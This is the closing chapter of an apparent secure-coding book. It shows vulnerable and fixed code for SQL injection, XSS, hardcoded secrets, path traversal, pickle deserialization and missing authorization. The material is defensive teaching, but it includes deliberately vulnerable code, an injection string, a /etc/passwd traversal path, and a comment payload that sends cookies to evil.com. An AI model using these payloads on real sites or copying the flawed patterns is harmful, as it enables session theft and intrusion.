Chapter 18

Security Review of AI-Generated Code — Complete Guide to 6 Vulnerability Classes

AI errors are not random — they follow patterns. Training data is full of unsafe legacy code; AI prefers the shortest path, and secure implementations require extra steps. This chapter shows 6 recurring vulnerability classes with runnable wrong-and-right code examples for each, plus detection methods, .cursorrules prevention rules, a reusable AI security review Prompt, and a 20-item checklist.

Chapter goals: Recognize SQL injection, XSS, secret leakage, path traversal, insecure deserialization, and missing authorization in AI-generated code; apply the fix pattern for each; use the AI security review Prompt and 20-item checklist in your team's workflow.

Why AI-Generated Code Has Specific Security Problems

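The causes are systematic, not random noise: training data contains a great deal of unsafe legacy code, the model favors the shortest path to working code, and a secure implementation usually takes extra steps.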

Conclusion: AI code must go through a security review, especially code that handles user input, file operations, and database queries.

Vulnerability 1: SQL Injection (Most Common, Highest Impact)

Wrong — string-concatenated SQL

def get_user(username: str):
    query = f"SELECT * FROM users WHERE username = '{username}'"
    return db.execute(query)

# Attacker input: ' OR '1'='1
# Executed: SELECT * FROM users WHERE username = '' OR '1'='1'
# Result: returns all users, authentication bypassed

Correct — parameterized queries

# Option 1: Parameterized query (named placeholders; the exact style depends on the driver)
def get_user(username: str):
    return db.execute("SELECT * FROM users WHERE username = :username",
                      {"username": username})

# Option 2: ORM (preferred; it binds parameters for you)
def get_user_orm(username: str, db: Session):
    return db.query(User).filter(User.username == username).first()

# Option 3: Dynamic column names — use an allowlist, not concatenation
ALLOWED = {"username", "email"}
def get_by_field(field: str, value: str):
    if field not in ALLOWED:
        raise ValueError(f"Invalid field: {field}")
    return db.execute(f"SELECT * FROM users WHERE {field} = :v", {"v": value})

.cursorrules rule: "All database queries must use parameterized queries or ORM. String concatenation for SQL is forbidden."
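The difference between the two approaches can be reproduced locally. The following is a minimal sketch using Python's built-in sqlite3 module with an in-memory database; the table contents and the function names `get_user_unsafe` and `get_user_safe` are illustrative assumptions, not part of the chapter's application code.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with two hypothetical users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn


def get_user_unsafe(conn: sqlite3.Connection, username: str):
    # Vulnerable: the input becomes part of the SQL text itself.
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def get_user_safe(conn: sqlite3.Connection, username: str):
    # Safe: the value is bound separately and never parsed as SQL.
    return conn.execute(
        "SELECT username FROM users WHERE username = :username",
        {"username": username},
    ).fetchall()


conn = make_db()
payload = "' OR '1'='1"
leaked = get_user_unsafe(conn, payload)   # the OR clause matches every row
blocked = get_user_safe(conn, payload)    # no user has this literal name
```

With the payload from the example above, the concatenated query returns both rows, while the parameterized query treats the whole payload as one (nonexistent) username.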

Vulnerability 2: XSS (React-Specific Risk)

React auto-escapes JSX text content, but dangerouslySetInnerHTML bypasses that entirely. AI uses it for "convenient rich text rendering" without considering the data source.

Wrong — dangerouslySetInnerHTML on user input

function UserComment({ comment }: { comment: string }) {
  return <div dangerouslySetInnerHTML={{ __html: comment }} />;
  // If comment is user-controlled: instant XSS
  // Attacker: <img src=x onerror="fetch('https://evil.com/?c='+document.cookie)">
  // (a <script> tag inserted via innerHTML does not run, but event-handler attributes do)
}

Correct — text render or DOMPurify sanitize

// Option 1: plain text — React auto-escapes (use for 90% of cases)
function UserComment({ comment }: { comment: string }) {
  return <div>{comment}</div>;
}

// Option 2: must render HTML — sanitize first
import DOMPurify from 'dompurify';

function RichComment({ html }: { html: string }) {
  const clean = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
    ALLOWED_ATTR: ['href', 'target']
  });
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}
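The principle behind auto-escaping is not specific to React. As a rough illustration only, the sketch below uses Python's standard `html.escape` as a stand-in for what a rendering layer does to text content; it is not React's actual implementation, and the payload is a hypothetical example.

```python
from html import escape

# A typical attribute-based XSS payload (hypothetical example).
payload = '<img src=x onerror="alert(1)">'

# Escaping turns markup characters into entities, so the browser
# displays the string as text instead of parsing it as an element.
escaped = escape(payload)
```

After escaping, the string contains no raw angle brackets or quotes, which is why rendering user input as plain text is safe by default.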

Vulnerability 3: Hardcoded Secrets

AI fills in real-looking API keys in "example" code. You commit without looking carefully, push to GitHub, and bots find and try the credentials within minutes.

Wrong — secrets in source code

stripe.api_key = "sk_live_abc123xxxxxxxxxxxxxxxxxxxxxxxx"
JWT_SECRET = "mysecretkey123"
DATABASE_URL = "postgresql://admin:<password>@<host>/mydb"  # real password embedded in the URL

Correct — all secrets from environment variables

import os

import stripe
from dotenv import load_dotenv  # .env must be in .gitignore

load_dotenv()

# Validate first, so a single error lists every missing or empty variable
REQUIRED = ["STRIPE_SECRET_KEY", "JWT_SECRET", "DATABASE_URL"]
missing = [k for k in REQUIRED if not os.environ.get(k)]
if missing:
    raise EnvironmentError(f"Missing required env vars: {missing}")

# Use [] not .get(): fail loudly if a key is missing
stripe.api_key = os.environ["STRIPE_SECRET_KEY"]
JWT_SECRET = os.environ["JWT_SECRET"]
DATABASE_URL = os.environ["DATABASE_URL"]

Add gitleaks to your pre-commit hooks to auto-scan staged changes for secrets before every commit.
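To make concrete what a secret scanner looks for, here is a toy sketch of pattern-based detection. The two regular expressions and the `scan` function are illustrative assumptions; they are not gitleaks' rules, and a real scanner ships a far larger rule set along with entropy checks and history scanning.

```python
import re

# Illustrative patterns only; not taken from any real scanner.
PATTERNS = {
    "stripe-live-key": re.compile(r"sk_live_[0-9A-Za-z]{16,}"),
    "hardcoded-secret": re.compile(
        r"(?i)\b\w*(secret|password|api_key|token)\w*\s*=\s*[\"'][^\"']{8,}[\"']"
    ),
}


def scan(text: str) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings


sample = '''stripe.api_key = "sk_live_abc123xxxxxxxxxxxxxxxxxxxx"
JWT_SECRET = "mysecretkey123"
JWT_SECRET = os.environ["JWT_SECRET"]
'''
findings = scan(sample)
```

The first two lines of the sample are flagged because a string literal is assigned to a secret-like name; the third line reads from the environment and passes.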

Vulnerability 4: Path Traversal

AI concatenates user input directly into file paths. Attackers use ../../ to escape the intended directory and read system files.

Wrong — user input concatenated into file path

@app.get("/files/{filename}")
def read_file(filename: str):
    path = f"/app/uploads/{filename}"
    return open(path).read()
# Attack: a filename of ../../etc/passwd resolves to /etc/passwd
# (most directly exploitable when the route accepts slashes, e.g. {filename:path})

Correct — normalize and verify path stays within bounds

import re
from pathlib import Path
from fastapi import FastAPI, HTTPException

app = FastAPI()
BASE = Path("/app/uploads").resolve()

@app.get("/files/{filename}")
def read_file(filename: str):
    # Step 1: allowlist of safe characters (fullmatch also rejects a trailing newline)
    if not re.fullmatch(r'[a-zA-Z0-9._-]+', filename):
        raise HTTPException(400, "Invalid filename")
    # Step 2: resolve real path (eliminates ../ and follows symlinks)
    path = (BASE / filename).resolve()
    # Step 3: verify real path is inside the base directory.
    # is_relative_to (Python 3.9+) compares whole path components; a string
    # prefix check would also accept a sibling such as /app/uploads_old
    if not path.is_relative_to(BASE):
        raise HTTPException(403, "Access denied")
    if not path.is_file():
        raise HTTPException(404, "Not found")
    return path.read_text()
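One subtlety in the boundary check is worth seeing in isolation: comparing resolved paths as strings can be fooled by a sibling directory that shares the same prefix. The sketch below, which assumes Python 3.9+ for `Path.is_relative_to` and uses hypothetical directory names inside a temporary folder, contrasts the two checks.

```python
import tempfile
from pathlib import Path


def is_inside(base: Path, candidate: Path) -> bool:
    """True only if candidate resolves to a location under base."""
    return candidate.resolve().is_relative_to(base.resolve())


with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp) / "uploads"
    sibling = Path(tmp) / "uploads_private"  # shares the string prefix
    base.mkdir()
    sibling.mkdir()

    inside = base / "report.txt"
    escaping = base / ".." / "uploads_private" / "secret.txt"

    # A raw string-prefix test wrongly accepts the sibling directory.
    prefix_check = str(escaping.resolve()).startswith(str(base.resolve()))
    # The path-aware test compares whole path components.
    component_check = is_inside(base, escaping)
    ok_check = is_inside(base, inside)
```

Here the string-prefix test accepts the escaping path while the component-wise test rejects it, which is the reason to prefer `is_relative_to` for containment checks.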

Vulnerability 5: Insecure Deserialization

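Python's pickle can execute arbitrary code while deserializing, because the byte stream itself names the callables to invoke. AI commonly suggests it for caching. If an untrusted party can write the data (a compromised Redis instance, anything received over the network), this becomes a remote code execution vulnerability.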

Wrong — pickle on external data

import pickle, redis
r = redis.Redis()

def load_session(session_id: str):
    data = r.get(f"session:{session_id}")
    return pickle.loads(data) if data else None
    # If an attacker can write to Redis, they can execute arbitrary code

Correct — JSON + Pydantic validation

import redis
from pydantic import BaseModel

class UserSession(BaseModel):
    user_id: int
    username: str
    roles: list[str]

r = redis.Redis()

def load_session(session_id: str) -> UserSession | None:
    data = r.get(f"session:{session_id}")
    if not data:
        return None
    return UserSession.model_validate_json(data)  # safe — no code execution

def save_session(session_id: str, s: UserSession, ttl: int = 3600):
    r.setex(f"session:{session_id}", ttl, s.model_dump_json())

Rule: Never use pickle.loads() on data that crosses a trust boundary — network data, user input, Redis cache, or any external storage.
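Why pickle is dangerous can be shown with a harmless stand-in for an attack. In this sketch the class name `Exploit` is hypothetical, and the payload only evaluates an arithmetic expression; a real attacker would name a callable that runs shell commands instead.

```python
import json
import pickle


class Exploit:
    """Stand-in for attacker-crafted data.

    __reduce__ tells pickle which callable to invoke at load time;
    here it is eval on a harmless arithmetic expression.
    """

    def __reduce__(self):
        return (eval, ("40 + 2",))


malicious_bytes = pickle.dumps(Exploit())

# Loading calls eval("40 + 2") and returns its result, not an object.
result = pickle.loads(malicious_bytes)

# A JSON parser only builds data; the same bytes are simply rejected.
try:
    json.loads(malicious_bytes)
    rejected = False
except ValueError:
    rejected = True
```

The call to `pickle.loads` ran code chosen by whoever produced the bytes, whereas the JSON parser has no mechanism for invoking callables at all.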

Vulnerability 6: Missing Authorization

AI generates endpoint logic but forgets authorization checks. Any logged-in user can access any other user's data.

Wrong — checks login but not ownership

@app.get("/api/users/{user_id}/orders")
def get_orders(user_id: int, current_user=Depends(get_current_user)):
    # Verifies login — but any logged-in user can query any user_id
    return db.query(Order).filter(Order.user_id == user_id).all()

Correct — verify ownership before returning data

@app.get("/api/users/{user_id}/orders")
def get_orders(user_id: int, current_user: User = Depends(get_current_user)):
    if current_user.id != user_id and not current_user.is_admin:
        raise HTTPException(403, "Access denied")
    return db.query(Order).filter(Order.user_id == user_id).all()

# Better: eliminate the parameter entirely — use current_user.id directly
@app.get("/api/my/orders")
def get_my_orders(current_user: User = Depends(get_current_user)):
    return db.query(Order).filter(Order.user_id == current_user.id).all()
    # No user_id in URL = no IDOR risk at all
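The ownership rule is easier to keep consistent, and to unit-test, when it lives in one small function instead of being repeated in each endpoint. The following is a framework-free sketch; `User`, `Forbidden`, `require_owner_or_admin`, and `can_access` are hypothetical names introduced for illustration, not part of FastAPI or of the chapter's code.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    is_admin: bool = False


class Forbidden(Exception):
    """Raised when the caller may not access the requested resource."""


def require_owner_or_admin(current_user: User, owner_id: int) -> None:
    # Authentication says who the caller is; this check says what
    # the caller is allowed to touch.
    if current_user.id != owner_id and not current_user.is_admin:
        raise Forbidden(
            f"user {current_user.id} may not access user {owner_id}"
        )


def can_access(current_user: User, owner_id: int) -> bool:
    """Boolean wrapper, convenient in tests."""
    try:
        require_owner_or_admin(current_user, owner_id)
        return True
    except Forbidden:
        return False


alice, bob, admin = User(1), User(2), User(99, is_admin=True)
```

In a web handler, the `Forbidden` exception would be translated into a 403 response; the point of the sketch is that the IDOR case (bob requesting alice's data) is covered by a plain unit test.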

AI Security Review Prompt

You are a security engineer. Review the following code for security issues.

Priority checklist (in order):
1. Database queries: are all using parameterized queries? Any string-concatenated SQL?
2. User input handling: is all untrusted data validated before use?
3. File operations: is the path normalized and verified to stay within the allowed directory?
4. Authorization: does every protected endpoint verify both authentication AND ownership?
5. Secrets: are all credentials read from environment variables? Any hardcoded?
6. Deserialization: is pickle/eval/exec used on data from the network or user input?

Report only real issues. For each finding include:
- File name and line number
- Vulnerability type
- Attack scenario in one sentence
- Working fix code (the correct implementation)

@[file to review]

20-Item Security Checklist for AI-Generated Code

| # | Check item | Level |
|---|---|---|
| 1 | All SQL queries use parameterized queries or an ORM; no string concatenation | Must |
| 2 | User input validated before use (Pydantic / Zod / regex) | Must |
| 3 | No secrets, passwords, or tokens hardcoded in source (scan git log) | Must |
| 4 | File path operations are normalized and boundary-checked | Must |
| 5 | Every API endpoint verifies authorization, not just authentication | Must |
| 6 | Error responses don't leak stack traces, DB schema, or internal IPs | Must |
| 7 | pickle/eval/exec not used on network data or user input | Must |
| 8 | All API communication uses HTTPS; no plaintext sensitive data in transit | Must |
| 9 | Passwords hashed with bcrypt or argon2, not MD5/SHA1 | Must |
| 10 | JWT signature algorithm and secret verified correctly; alg:none rejected | Must |
| 11 | Debug mode disabled in production; detailed error pages off | Must |
| 12 | Rate limiting on APIs to prevent brute-force and DDoS | Recommended |
| 13 | CSRF tokens on state-changing operations (POST/PUT/DELETE) | Recommended |
| 14 | Dependencies updated regularly; pip-audit / npm audit runs in CI | Recommended |
| 15 | Logs don't record passwords, tokens, or full credit card numbers | Recommended |
| 16 | Uploaded files validated for type (MIME + extension) and size | Recommended |
| 17 | Database connections use a least-privilege account, not root | Recommended |
| 18 | Sensitive operations (delete, payment, permission change) have audit logs | Recommended |
| 19 | Third-party CDN scripts use Subresource Integrity (SRI) verification | Recommended |
| 20 | Penetration testing done periodically, especially before major feature launches | Recommended |

Chapter Key Points — and a Note to Close the Book

  1. AI code must be security-reviewed: The vulnerability patterns are predictable — SQL injection, XSS, and hardcoded secrets are the top three. Add this chapter's checklist to your PR template and run through it before every merge.
  2. Security rules in .cursorrules are the highest-leverage prevention: Better to prevent than detect. Three rules — no SQL concatenation, no dangerouslySetInnerHTML on user input, all secrets from env vars — eliminate 80% of AI-generated security issues before code is even written.
  3. Path traversal and missing authorization are the most overlooked: SQL injection awareness is now common; path traversal (Path.resolve + boundary check) and IDOR (URL parameter replaced with another user's ID) still appear frequently in AI-generated code.
  4. Use gitleaks as a pre-commit hook: Once a secret is pushed, it may already be compromised. Local scanning before commit is the last line of defense. Five minutes to configure, prevents major incidents.
  5. AI makes coding faster — and mistakes faster too: Build security awareness, establish team standards, review regularly. Do those three things and AI is a genuine force multiplier. Skip them and it's a liability. All 18 chapters of this book have given you the tools, techniques, and workflows — what follows is practice and iteration in real projects.

End of book: From Chapter 1 ("Why the AI Coding Era") to Chapter 18 ("AI Code Security Review"), this book has covered everything from setup to production deployment. The AI coding landscape will keep evolving — staying curious and practicing deliberately is the only way to keep up.
